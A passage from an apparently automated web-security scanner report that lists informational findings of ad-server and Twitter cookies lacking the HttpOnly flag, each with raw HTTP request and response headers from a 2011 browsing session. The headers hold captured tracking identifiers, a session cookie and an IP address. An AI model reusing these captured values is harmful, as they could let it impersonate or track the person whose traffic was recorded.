Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-8560941387472259&output=html&h=250&slotname=8504762554&w=300&lmt=1304973456&flash=10.2.154&url=http%3A%2F%2Fwww.therepublic.com%2Fhome%2F&dt=1304955456815&bpp=48&shv=r20110427&jsv=r20110427&correlator=1304955456958&frm=0&adk=3853240141&ga_vid=434740447.1304955454&ga_sid=1304955454&ga_hid=157227490&ga_fc=0&u_tz=-300&u_his=4&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=45&biw=1050&bih=968&ref=http%3A%2F%2Fwww.therepublic.com%2Flogin%2Fprocess%2F&fu=0&ifi=2&dtd=163&xpc=iqVH5Fr9Rv&p=http%3A//www.therepublic.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BTA144=; BTA=GUID=4CEEBF00B4224B529E63931FA8A025A6

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Expires: Sun, 08 May 2011 15:37:41 GMT
Vary: Accept-Encoding
P3P: CP="NON DSP COR DEVa PSAa IVAo CONo OUR IND UNI PUR NAV DEM LOC", policyref="http://ads.bridgetrack.com/w3c/p3p.xml"
Set-Cookie: ASB164=TX=1304955461&D10=&D6=&D8=&D1=&D3=&Pb=104&A=8&SID=9996D17BE9434FAF86AAA6900B6D6F82&D4=&Vn=1423&Ct=0&Pc=0&D5=&S=&Cn=200&Pd=0&D9=&D2=&T=588064&Cr=71712&D7=&W=72461&Tr=72461&Cp=2248&P=1559799&B=164; expires=Wed, 11-May-2011 04:00:00 GMT; path=/
Set-Cookie: ATV164=15920d163AJLc68c268c1FJ7Nc38c1CFc2610cHU90cc26ODc8ccc26ODcccccccccccccc; expires=Wed, 11-May-2011 04:00:00 GMT; path=/
Set-Cookie: VCC164=; expires=Sat, 01-Jan-2000 05:00:00 GMT; path=/
Set-Cookie: BTASES=SID=89BD0AAD619444D2AFEC01012356111B; path=/
Set-Cookie: BTA=GUID=4CEEBF00B4224B529E63931FA8A025A6; expires=Thu, 03-May-2012 04:00:00 GMT; path=/
Date: Mon, 09 May 2011 15:37:40 GMT
Connection: close
Content-Length: 4022

<script language=Javascript src="/ads_v2/script/btwrite.js"></script>
<SCRIPT LANGUAGE=Javascript>function BTAdClick(szURL){window.open(szURL);};var n=navigator;var h="";var fmnv=5;var fmav=10;var btf
...[SNIP]...

11.18. http://ads.pointroll.com/PortalServe/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.pointroll.com
Path:   /PortalServe/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /PortalServe/?pid=1233308J95620110310212114&flash=10&time=1|10:35|-5&redir=http://adclick.g.doubleclick.net/aclk%3Fsa%3DL%26ai%3DBEgMLqgnITYDyDaXRlQfxr83UCKTwo_oBvMa13hvAjbcBABABGAEgjfDlBTgAYMmGhYmIpIQQsgERd3d3LmNzbW9uaXRvci5jb226AQozMDB4MjUwX2FzyAEJ2gEhaHR0cDovL3d3dy5jc21vbml0b3IuY29tL0J1c2luZXNz4AEFmALADLgCGMgC5In4GeACAOoCDjMwMHgyNTBCX01vbmV5kAOkA5gD4AOoAwHoA2voA5MF6AOYA-gDiwnoA4wJ9QMCBABE9QMgAAAA4AQB%26num%3D1%26sig%3DAGiWqtyodj_3eco2oOZOH11No0LN9ZNq6g%26client%3Dca-pub-6743622525202572%26adurl%3D$CTURL$&r=0.18015406071208417 HTTP/1.1
Host: ads.pointroll.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PRID=B313D3CD-2147-4ACC-A03C-CCA65D06F94D; PRbu=EoSNMBpPq; PRsl=11042210442417319321424330526S; PRvt=CFJBaEoSNMBpPqAI5BBeJUpEoeWZPXI2ARGCAeJo2Eonlg6HlnAEZCAeJozEon0qBOtv!FLBCeJpJEothAYwPFAxsCAe; PRgo=BCBAAsJvCAAuILCBF-19!BCVBF4FR; PRimp=D9A20400-8E82-28EE-0209-AFE0003E0200; PRca=|AKTy*9203:1|AKRD*2017:1|AKQh*130:2|AKQf*282:294|AKTa*130:1|AKVY*127:1|AKQk*1753:10|AKPE*832:2|AKN6*527:2|AJvt*77:1|AKDp*36:2|AKOh*27:1|AKRt*47:2|AKOA*1753:1|AJsL*1753:1|AKGw*2017:1|AJvr*1753:1|AKLp*1753:2|AJcC*23172:1|#; PRcp=|AKTyACY1:1|AKRDAA67:1|AKQhAACG:2|AKQfAAE8:294|AKTaAACG:1|AKQkAFiH:1|AKVYAACD:1|AKQkAFx5:2|AKQkAA2R:7|AKPEAAN0:2|AKN6AAI5:2|AJvtAABP:1|AKDpAAAa:2|AKOhAAA1:1|AKRtAAAl:2|AKOAAA2R:1|AJsLAA2R:1|AKGwAA67:1|AJvrAA2R:1|AKLpAA2R:2|AJcCAGBk:1|#; PRpl=|FWcL:1|FZsH:1|FYnl:1|FYnm:1|FVn1:58|FVnS:59|FVnT:59|FVnV:59|FVnU:59|FWau:1|FW9s:1|FW9l:1|FY3g:1|FW9r:1|FW9T:3|FW9U:4|FOLx:1|FOLw:1|FPoF:2|Eviz:1|FLXe:1|FLW9:1|FODi:1|FUZr:2|FOn5:1|Etxz:1|FO2m:1|FCbK:1|FPLN:2|Eoxl:1|#; PRcr=|GLLp:1|GMjB:1|GMEZ:1|GMEa:1|GLEi:58|GLEl:59|GLEo:59|GLEp:59|GLEm:59|GKw2:1|GMGQ:1|GLZC:1|GLZE:4|GLZD:3|GLZB:2|GJTv:1|GJTs:1|GKTE:1|GKTL:1|FzvF:1|GHhF:2|GJQB:1|GKwB:1|GKvy:1|GJsu:1|GA7A:1|GKDl:1|GJij:1|GDVY:1|GKCp:1|Fy9A:1|#; PRpc=|FWcLGLLp:1|FZsHGMjB:1|FYnlGMEZ:1|FYnmGMEa:1|FVn1GLEi:58|FVnSGLEl:59|FVnTGLEo:59|FVnVGLEp:59|FVnUGLEm:59|FWauGKw2:1|FW9sGLZE:1|FW9lGLZE:1|FY3gGMGQ:1|FW9rGLZC:1|FW9UGLZE:2|FW9TGLZD:3|FW9UGLZB:2|FOLxGJTv:1|FOLwGJTs:1|FPoFGKTE:1|FPoFGKTL:1|EvizFzvF:1|FLXeGHhF:1|FLW9GHhF:1|FODiGJQB:1|FUZrGKwB:1|FUZrGKvy:1|FOn5GJsu:1|EtxzGA7A:1|FPLNGKDl:1|FO2mGJij:1|FCbKGDVY:1|FPLNGKCp:1|EoxlFy9A:1|#

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 09 May 2011 15:35:08 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
Cache-Control: no-cache
Content-type: text/html
Content-length: 4400
Set-Cookie:PRvt=CGJBaEoSNMBpPqAI5BBeJUpEoeWZPXI2ARGCAeJo2Eonlg6HlnAEZCAeJozEon0qBOtv!FLBCeJpJEothAYwPFAxsCAeJjUEotmVlODIAEcCDe;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;;
Set-Cookie:PRgo=BCBAAsJvCAAuILDBF-19!BCVBF4FRDVCFUE6;domain=.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;;
Set-Cookie:PRimp=D9A20400-9495-C8E0-0309-8D40011C0203; domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRca=|AKLC*1774:1|AKTy*9203:1|AKRD*2017:1|AKQh*130:2|AKQf*282:294|AKTa*130:1|AKVY*127:1|AKQk*1753:10|AKPE*832:2|AKN6*527:2|AJvt*77:1|AKDp*36:2|AKOh*27:1|AKRt*47:2|AKOA*1753:1|AJsL*1753:1|AKGw*2017:1|AJvr*1753:1|AKLp*1753:2|AJcC*23172:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRcp=|AKLCAA2c:1|AKTyACY1:1|AKRDAA67:1|AKQhAACG:2|AKQfAAE8:294|AKTaAACG:1|AKQkAFiH:1|AKVYAACD:1|AKQkAFx5:2|AKQkAA2R:7|AKPEAAN0:2|AKN6AAI5:2|AJvtAABP:1|AKDpAAAa:2|AKOhAAA1:1|AKRtAAAl:2|AKOAAA2R:1|AJsLAA2R:1|AKGwAA67:1|AJvrAA2R:1|AKLpAA2R:2|AJcCAGBk:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRpl=|FKqE:1|FWcL:1|FZsH:1|FYnl:1|FYnm:1|FVn1:58|FVnS:59|FVnT:59|FVnV:59|FVnU:59|FWau:1|FW9s:1|FW9l:1|FY3g:1|FW9r:1|FW9T:3|FW9U:4|FOLx:1|FOLw:1|FPoF:2|Eviz:1|FLXe:1|FLW9:1|FODi:1|FUZr:2|FOn5:1|Etxz:1|FO2m:1|FCbK:1|FPLN:2|Eoxl:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRcr=|GKwo:1|GLLp:1|GMjB:1|GMEZ:1|GMEa:1|GLEi:58|GLEl:59|GLEo:59|GLEp:59|GLEm:59|GKw2:1|GMGQ:1|GLZC:1|GLZE:4|GLZD:3|GLZB:2|GJTv:1|GJTs:1|GKTE:1|GKTL:1|FzvF:1|GHhF:2|GJQB:1|GKwB:1|GKvy:1|GJsu:1|GA7A:1|GKDl:1|GJij:1|GDVY:1|GKCp:1|Fy9A:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRpc=|FKqEGKwo:1|FWcLGLLp:1|FZsHGMjB:1|FYnlGMEZ:1|FYnmGMEa:1|FVn1GLEi:58|FVnSGLEl:59|FVnTGLEo:59|FVnVGLEp:59|FVnUGLEm:59|FWauGKw2:1|FW9sGLZE:1|FW9lGLZE:1|FY3gGMGQ:1|FW9rGLZC:1|FW9UGLZE:2|FW9TGLZD:3|FW9UGLZB:2|FOLxGJTv:1|FOLwGJTs:1|FPoFGKTE:1|FPoFGKTL:1|EvizFzvF:1|FLXeGHhF:1|FLW9GHhF:1|FODiGJQB:1|FUZrGKwB:1|FUZrGKvy:1|FOn5GJsu:1|EtxzGA7A:1|FPLNGKDl:1|FO2mGJij:1|FCbKGDVY:1|FPLNGKCp:1|EoxlFy9A:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;

var prwin=window;if(!prwin.prRefs){prwin.prRefs={};};prwin.prSet=function(n,v){if((typeof(n)!='undefined')&&(typeof(v)!='undefined')){prwin.prRefs[n]=v;}};prwin.prGet=function(n){if(typeof(prwin.prRef
...[SNIP]...

11.19. http://ads.revsci.net/adserver/ako

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.revsci.net
Path:   /adserver/ako

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserver/ako?record_activation&rsi_dpr=1274605-56918-315889-1268392-317325-1198035-1049794-1238051-74560-1086373-1196055-1264419-593881-1215295-1086372-1086371-1086370-926097-1086369-1196051-1147048-1049851-1063912-1063916-1166710-1063911-1063910-1215322-715901-1023315-725071-109108-75921-1006093-86237-1006089-1049785-1086731-1049788-1086733-1284585-1044410-1077940-1093100-397181-1044578-1041270-1049769-596293-1049770-576685-1044587-596291-1049772 HTTP/1.1
Host: ads.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.usatoday.com/weather/floods/2011-05-02-ohio-mississippi-river-floods_n.htm
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=8e1e1163986432e20f9603df067356d2; NETSEGS_G08769=bff01c00ddc153c5&G08769&0&4de391c0&0&&4dbe39cf&271d956a153787d6fee9112e9c6a9326; NETSEGS_G07608=bff01c00ddc153c5&G07608&0&4de3df00&0&&4dbe409f&271d956a153787d6fee9112e9c6a9326; NETSEGS_K08784=bff01c00ddc153c5&K08784&0&4de3fb79&0&&4dbe5453&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05540=bff01c00ddc153c5&K05540&0&4de595d8&10&10572,10573,10342,10343,10391,10395,10432,10537,10538,10166&4dbfac5c&271d956a153787d6fee9112e9c6a9326; NETSEGS_H07710=bff01c00ddc153c5&H07710&0&4de96140&0&&4dc3b759&271d956a153787d6fee9112e9c6a9326; NETSEGS_H10972=bff01c00ddc153c5&H10972&0&4de961a8&0&&4dc36aa3&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05539=bff01c00ddc153c5&K05539&0&4de961b8&1&10592&4dc358e3&271d956a153787d6fee9112e9c6a9326; NETSEGS_J05531=bff01c00ddc153c5&J05531&0&4dea160e&0&&4dc4b40e&271d956a153787d6fee9112e9c6a9326; NETSEGS_B08725=bff01c00ddc153c5&B08725&0&4decdd55&1&10011&4dc75936&271d956a153787d6fee9112e9c6a9326; NETSEGS_I10982=bff01c00ddc153c5&I10982&0&4decdd8d&0&&4dc76d7a&271d956a153787d6fee9112e9c6a9326; NETSEGS_E05516=bff01c00ddc153c5&E05516&0&4decf25d&8&11797,12348,12360,12390,12566,12572,11854,50049&4dc75d7d&271d956a153787d6fee9112e9c6a9326; NETSEGS_J06575=bff01c00ddc153c5&J06575&0&4decf417&0&&4dc77286&271d956a153787d6fee9112e9c6a9326; NETSEGS_F07607=bff01c00ddc153c5&F07607&0&4decf45e&6&10124,10098,10078,10053,10100,10143&4dc74a5e&271d956a153787d6fee9112e9c6a9326; rtc_4-db=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; rsiPus_j6zu="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"; rsi_us_1000000="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"; rsi_segs_1000000=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; udm_0=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

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_j6zu=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_j6zu=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_SkQn="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"; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Set-Cookie: rsi_us_1000000="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"; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Content-Type: image/gif
Content-Length: 43
Date: Mon, 09 May 2011 15:38:32 GMT

GIF89a.............!.......,...........D..;

11.20. http://ads.revsci.net/adserver/ako

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.revsci.net
Path:   /adserver/ako

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserver/ako?activate&csid=J06575 HTTP/1.1
Host: ads.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.usatoday.com/weather/floods/2011-05-02-ohio-mississippi-river-floods_n.htm
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=8e1e1163986432e20f9603df067356d2; NETSEGS_G08769=bff01c00ddc153c5&G08769&0&4de391c0&0&&4dbe39cf&271d956a153787d6fee9112e9c6a9326; NETSEGS_G07608=bff01c00ddc153c5&G07608&0&4de3df00&0&&4dbe409f&271d956a153787d6fee9112e9c6a9326; NETSEGS_F07607=bff01c00ddc153c5&F07607&0&4de3dffd&6&10124,10098,10078,10053,10100,10143&4dbe0e23&271d956a153787d6fee9112e9c6a9326; NETSEGS_K08784=bff01c00ddc153c5&K08784&0&4de3fb79&0&&4dbe5453&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05540=bff01c00ddc153c5&K05540&0&4de595d8&10&10572,10573,10342,10343,10391,10395,10432,10537,10538,10166&4dbfac5c&271d956a153787d6fee9112e9c6a9326; NETSEGS_H07710=bff01c00ddc153c5&H07710&0&4de96140&0&&4dc3b759&271d956a153787d6fee9112e9c6a9326; NETSEGS_H10972=bff01c00ddc153c5&H10972&0&4de961a8&0&&4dc36aa3&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05539=bff01c00ddc153c5&K05539&0&4de961b8&1&10592&4dc358e3&271d956a153787d6fee9112e9c6a9326; NETSEGS_J05531=bff01c00ddc153c5&J05531&0&4dea160e&0&&4dc4b40e&271d956a153787d6fee9112e9c6a9326; NETSEGS_B08725=bff01c00ddc153c5&B08725&0&4decdd55&1&10011&4dc75936&271d956a153787d6fee9112e9c6a9326; NETSEGS_I10982=bff01c00ddc153c5&I10982&0&4decdd8d&0&&4dc76d7a&271d956a153787d6fee9112e9c6a9326; NETSEGS_E05516=bff01c00ddc153c5&E05516&0&4decf25d&8&11797,12348,12360,12390,12566,12572,11854,50049&4dc75d7d&271d956a153787d6fee9112e9c6a9326; udm_0=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; rsiPus_GcbX="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"; rsi_us_1000000="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"; rsi_segs_1000000=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; rtc_8DRJ=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; NETSEGS_J06575=bff01c00ddc153c5&J06575&0&4decf417&0&&4dc77286&271d956a153787d6fee9112e9c6a9326

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_GcbX=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_GcbX=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_LRCK="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"; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Set-Cookie: rsi_us_1000000="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"; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Content-Type: application/x-javascript;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Mon, 09 May 2011 15:38:17 GMT
Content-Length: 1630

function rsi_img(p,u,c){if(u.indexOf(location.protocol)==0){var i=new Image(2,3);if(c){i.onload=c;}
i.src=u;p[p.length]=i;}}
function rsi_simg(p,s,i){if(i<s.length){rsi_img(p,s[i],function(){rsi_sim
...[SNIP]...

11.21. http://amch.questionmarket.com/adsc/d887938/3/500004862365/decide.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://amch.questionmarket.com
Path:   /adsc/d887938/3/500004862365/decide.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adsc/d887938/3/500004862365/decide.php?ord=1304955586 HTTP/1.1
Host: amch.questionmarket.com
Proxy-Connection: keep-alive
Referer: http://www.npr.org/templates/reg/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GP=XCLGFbrowser=Cg8JIk24ijttAAAASDs; CS1=725047-17-5_725047-7-2_725047-14-1_725047-12-1_40147218-21-1_41662936-12-1_851211-1-1_41115363-7-1_40774550-15-1_40379521-23-2_40774545-15-1_717103-2-1_500005059184-4-1_892555-6-2_41645540-6-1_41838359-2-1_891856-2-1_725047-4-1_725047-18-3_725047-9-1_865756-1-1; ES=859330-mt!$M-0_851211-g|0'M-0_840009-~d2'M-0_866249-hAB'M-^2_878089-aAB'M-N3_674921-dnE'M-0_884653-YBE'M-0_878529-m!E'M-C_908201-su''M-0_891575-V(''M-0_724925-fwM$M-JXi1_865756-Ihl$M-WaK1

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:40:03 GMT
Server: Apache/2.2.3
X-Powered-By: PHP/4.4.4
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Pragma: no-cache
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
DL_S: b202.dl
Set-Cookie: CS1=deleted; expires=Sun, 09 May 2010 15:40:02 GMT; path=/; domain=.questionmarket.com
Set-Cookie: CS1=725047-17-5_725047-7-2_725047-14-1_725047-12-1_40147218-21-1_41662936-12-1_851211-1-1_41115363-7-1_40774550-15-1_40379521-23-2_40774545-15-1_717103-2-1_500005059184-4-1_892555-6-2_41645540-6-1_41838359-2-1_891856-2-1_725047-4-1_725047-18-3_725047-9-1_865756-1-1_500004862365-3-1; expires=Fri, 29 Jun 2012 07:40:03 GMT; path=/; domain=.questionmarket.com
Set-Cookie: ES=859330-mt!$M-0_851211-g|0'M-0_840009-~d2'M-0_866249-hAB'M-^2_878089-aAB'M-N3_674921-dnE'M-0_884653-YBE'M-0_878529-m!E'M-C_908201-su''M-0_891575-V(''M-0_724925-fwM$M-JXi1_865756-Ihl$M-WaK1_887938-y]y(M-0; expires=Fri, 29-Jun-2012 07:40:03 GMT; path=/; domain=.questionmarket.com;
Cache-Control: post-check=0, pre-check=0
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,...........D..;

11.22. http://api.twitter.com/1/wvuefox8/lists/wvue-fox-8-3/statuses.json

Summary

Severity:   Information
Confidence:   Certain
Host:   http://api.twitter.com
Path:   /1/wvuefox8/lists/wvue-fox-8-3/statuses.json

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /1/wvuefox8/lists/wvue-fox-8-3/statuses.json?callback=TWTR.Widget.receiveCallback_1&include_rts=true&clientsource=TWITTERINC_WIDGET&1304955538932=cachebust HTTP/1.1
Host: api.twitter.com
Proxy-Connection: keep-alive
Referer: http://www.fox8live.com/default.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: guest_id=130314166807091166; __utmz=43838368.1303561994.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); k=173.193.214.243.1304470443436909; __utma=43838368.551233229.1303561994.1304617828.1304721594.4

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:39:41 GMT
Server: hi
Status: 200 OK
X-Transaction: 1304955581-43234-51315
X-RateLimit-Limit: 150
ETag: "d640a63e6d4c8f178a68be50c58e168a"-gzip
Last-Modified: Mon, 09 May 2011 15:39:41 GMT
X-RateLimit-Remaining: 148
X-Runtime: 0.04042
X-Transaction-Mask: a6183ffa5f8ca943ff1b53b5644ef114bc137096
Content-Type: application/json; charset=utf-8
Pragma: no-cache
X-RateLimit-Class: api
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
X-MID: e74652c3d440cadd935e7e0b1675c0679bbdd85f
X-RateLimit-Reset: 1304959140
Set-Cookie: original_referer=ZLhHHTiegr%2FMnOT%2Fp8liqKLpSbkz6bAtT4p5bnOw1ZAfyga3xOTsMg%3D%3D; path=/
Set-Cookie: _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCFzzadUvAToHaWQiJTM5Yjg2NzFhNGIzMWUw%250AZTAxOGEzYjc2YjE1OWFjZGRkIgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--2ae163b2825351976cb494802b1d845f55f5087e; domain=.twitter.com; path=/; HttpOnly
Vary: Accept-Encoding
Connection: close
Content-Length: 35250

TWTR.Widget.receiveCallback_1([{"text":"http:\/\/t.co\/PZWHmCQ","coordinates":null,"truncated":false,"id_str":"67605941750743040","source":"\u003Ca href=\"http:\/\/twitter.com\/download\/android\" rel
...[SNIP]...

11.23. http://ar.voicefive.com/b/wc_beacon.pli

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /b/wc_beacon.pli

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/wc_beacon.pli?n=BMX_G&d=0&v=method-%3E-1,ts-%3E1304955323.101,wait-%3E10000,&1304955323232 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1; ar_p91136705=exp=2&initExp=Tue Apr 26 18:40:08 2011&recExp=Wed Apr 27 12:40:09 2011&prad=296638419&arc=206710287&; ar_p92429851=exp=4&initExp=Tue Apr 26 18:36:13 2011&recExp=Wed Apr 27 12:40:21 2011&prad=296638425&arc=200912704&; ar_p84552060=exp=1&initExp=Wed Apr 27 19:31:14 2011&recExp=Wed Apr 27 19:31:14 2011&prad=2108505&arc=4477116&; ar_p82806590=exp=1&initExp=Thu Apr 28 21:29:14 2011&recExp=Thu Apr 28 21:29:14 2011&prad=62872739&arc=40422016&; ar_p90452457=exp=1&initExp=Thu May 5 00:58:23 2011&recExp=Thu May 5 00:58:23 2011&prad=310177527&arc=211671722&; BMX_G=method->-1,ts->1304954985; ar_p97174789=exp=41&initExp=Sun Apr 24 12:09:48 2011&recExp=Mon May 9 15:35:22 2011&prad=253732017&arc=194941149&; BMX_3PC=1; UID=875e3f1e-184.84.247.65-1303349046

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 09 May 2011 15:35:23 GMT
Content-Type: image/gif
Connection: close
Vary: Accept-Encoding
Set-Cookie: BMX_G=method%2D%3E%2D1%2Cts%2D%3E1304955323%2E101%2Cwait%2D%3E10000%2C; path=/; domain=.voicefive.com;
Content-length: 42
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent

GIF89a.............!.......,........@..D.;

11.24. http://ar.voicefive.com/bmx3/broker.pli

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /bmx3/broker.pli?pid=p97174789&PRAd=253732017&AR_C=194941149 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
